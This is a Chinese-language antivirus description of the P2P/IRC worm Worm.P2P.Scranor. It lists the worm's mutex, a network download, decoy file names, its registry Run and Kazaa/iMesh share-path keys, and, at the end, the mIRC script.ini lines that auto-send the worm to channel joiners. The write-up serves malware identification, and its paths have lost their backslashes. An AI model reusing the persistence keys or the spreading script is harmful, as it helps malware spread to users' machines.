Worm.P2P.Scranor

病毒别名：

处理时间：

威胁级别：★★

中文名称：渣子

病毒类型：蠕虫

影响系统：Win9x / WinNT

病毒行为:

这是一个通过mIRC频道、iMesh和Kazaa文件共享系统传播的蠕虫病毒。该病毒发作的时候将自己的多个副本拷贝到%Program Files%sys32i目录下，这些病毒的名字取的都是流行软件的名字，因此具有很强的欺骗性，用户很可能误以为是正常的文件而去运行，从而导致中毒。病毒通过修改注册表和mIRC的脚本配置文件，将病毒与mIRC频道、iMesh和Kazaa文件共享系统联系起来，使得病毒能够通过这三个途径进行传播。如果系统时间是1月1日，该病毒还会弹出一个如下图所示的消息框，此外该病毒还从网上下载病毒到本地机器上运行。

1)建立互斥体W32.Scran-Worm，防止病毒的多个实例同时运行。

2)从网络上下载病毒到c:otnet.exe

3)在%Program Files%sys32i目录下建立病毒的多个副本：

Scran.exe

Scran.cpl

Resident Evil.exe

Tomb Raider.exe

Hotmail Hack.exe

Yahoo Hack.exe

Partition Magic 8.exe

Norton Anti Virus Crack.exe

Norton Anti Virus 2004.exe

Norton Anti Virus 2005.exe

Norton Firewall.exe

CD Key.exe

KeyGen.exe

Trojan Remover.exe

Counter Strike.exe

Counter Strike 6.exe

Half-Life.exe

Age of Empires crack.exe

Age of Empires.exe

Hotmail account cracker.exe

Microsoft Office.exe

Norton Internet Security 2004.exe

ZoneAlarm Firewall Pro.exe

Windows XP Home.exe

Playstation 2.exe

Grand Theft Auto 3 CD2 ISO.exe

4)添加启动项：

HKEY_LOCAL_MACHINESOFTWAREMicrosoftWindowsCurrentVersionRun

"W32.Scran"="%Program Files%sys32iScran.exe"

5)在注册表子键

HKEY_CURRENT_USERSoftwareImeshClientLocalContent

下添加键值

"Dir0"="012345:%Program Files%sys32i"

将%Program Files%sys32i设置为iMesh的默认传输路径

在注册表子键

HKEY_CURRENT_USERSoftwareKazaaTransfer

下添加键值

"DlDir0" = "%Program Files%sys32i"

和

在注册表子键

HKEY_CURRENT_USERSoftwareKazaaLocalContent

下添加键值

"Dir0"="012345:%Program Files%sys32i"

将%Program Files%sys32i设置为Kazaa的默认传输路径

6)向%Program Files%mIRCscript.ini中写入以下脚本，通过mIRC传播病毒：

[script]

n0= on 1:JOIN:#:{

n1= /if ( $nick == $me ) { halt }

n2= /.dcc send $nick %Program Files%sys32iScran.cpl